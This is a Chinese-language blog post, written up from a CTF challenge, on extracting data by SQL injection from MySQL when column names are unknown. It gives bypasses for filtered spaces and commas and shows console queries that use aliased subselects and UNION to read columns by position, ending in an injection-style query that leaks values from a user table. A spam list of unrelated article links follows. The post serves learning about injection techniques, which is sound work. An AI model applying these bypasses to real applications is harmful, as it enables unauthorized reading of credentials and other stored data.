Mysql如何巧妙的绕过未知字段名详解

前言

本文介绍的是DDCTF第五题，绕过未知字段名的技巧，这里拿本机来操作了下，思路很棒也很清晰，分享给大家，下面来看看详细的介绍：

实现思路

题目过滤空格和逗号，空格使用%0a，%0b，%0c，%0d，%a0，或者直接使用括号都可以绕过，逗号使用join绕过；

存放flag的字段名未知，information_schema.columns也将表名的hex过滤了，即获取不到字段名；这时可以利用联合查询，过程如下：

思想就是获取flag，让其在已知字段名下出现；

示例代码：

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

总结

以上就是这篇文章的全部内容了，希望本文的内容对大家的学习或者工作能带来一定的帮助，如果有疑问大家可以留言交流，谢谢大家对的支持。

# mysql注入绕过  # mysql  # 过滤逗号  # 过滤空格  # 防止xss和sql注入:JS特殊字符过滤正则  # 一个过滤重复数据的 SQL 语句  # MySQL注入绕开过滤的技巧总结  # SQL注入中绕过 单引号 限制继续注入  # SQL注入绕过的技巧总结  # 多列复合索引的使用 绕过微软sql server的一个缺陷  # 关于SQL注入绕过的一些知识点  # SQL Server简单模式下误删除堆表记录恢复方法(绕过页眉校验)  # SQL注入技巧之显注与盲注中过滤逗号绕过详析  # 字段名  # 的是  # 作了  # 也很  # 也将  # 给大家  # 来看看  # 这篇文章  # 谢谢大家  # 本机  # 可以利用  # 很棒  # 让其  # 有疑问  # hex  # class  # pre  # sql  # gt 

相关文章： 网站制作免费,什么网站能看正片电影？  如何确保FTP站点访问权限与数据传输安全？  实现点击下箭头变上箭头来回切换的两种方法【推荐】  如何通过可视化优化提升建站效果？  电商网站制作价格怎么算,网上拍卖流程以及规则？  制作企业网站建设方案,怎样建设一个公司网站？  建站10G流量真的够用吗？如何应对访问高峰？  如何打造高效商业网站？建站目的决定转化率  建站主机是否等同于虚拟主机？  建站主机SSH密钥生成步骤及常见问题解答？  存储型VPS适合搭建中小型网站吗？  义乌企业网站制作公司,请问义乌比较好的批发小商品的网站是什么？  建站之星安装模板失败：服务器环境不兼容？  济南网站制作的价格,历城一职专官方网站？  如何通过商城免费建站系统源码自定义网站主题？  如何在新浪SAE免费搭建个人博客？  网站视频怎么制作,哪个网站可以免费收看好莱坞经典大片？  如何通过FTP空间快速搭建安全高效网站？  网站制作说明怎么写,简述网页设计的流程并说明原因？  如何自定义建站之星模板颜色并下载新样式？  建站之星后台搭建步骤解析：模板选择与产品管理实操指南  如何配置IIS站点权限与局域网访问？  深圳 网站制作,深圳招聘网站哪个比较好一点啊？  ,石家庄四十八中学官网？  自助网站制作软件,个人如何自助建网站？  香港服务器网站推广：SEO优化与外贸独立站搭建策略  微信小程序 五星评分(包括半颗星评分)实例代码  黑客如何通过漏洞一步步攻陷网站服务器？  如何快速搭建支持数据库操作的智能建站平台？  儿童网站界面设计图片,中国少年儿童教育网站-怎么去注册？  如何通过cPanel快速搭建网站？  网站制作公司排行榜,四大门户网站排名？  网站设计制作书签怎么做,怎样将网页添加到书签/主页书签/桌面？  如何用美橙互联一键搭建多站合一网站？  昆明高端网站制作公司,昆明公租房申请网上登录入口？  中山网站推广排名,中山信息港登录入口？  Avalonia如何实现跨窗口通信 Avalonia窗口间数据传递  广东企业建站网站优化与SEO营销核心策略指南  武汉网站制作费用多少,在武汉武昌，建面100平方左右的房子，想装暖气片，费用大概是多少啊？  独立制作一个网站多少钱,建立网站需要花多少钱？  如何高效配置IIS服务器搭建网站？  电视网站制作tvbox接口,云海电视怎样自定义添加电视源？  北京营销型网站制作公司,可以用python做一个营销推广网站吗？  如何在橙子建站上传落地页？操作指南详解  如何登录建站主机？访问步骤全解析  如何通过万网虚拟主机快速搭建网站？  建站之星如何快速生成多端适配网站？  如何通过.red域名打造高辨识度品牌网站？  Python多线程使用规范_线程安全解析【教程】  如何在Tomcat中配置并部署网站项目？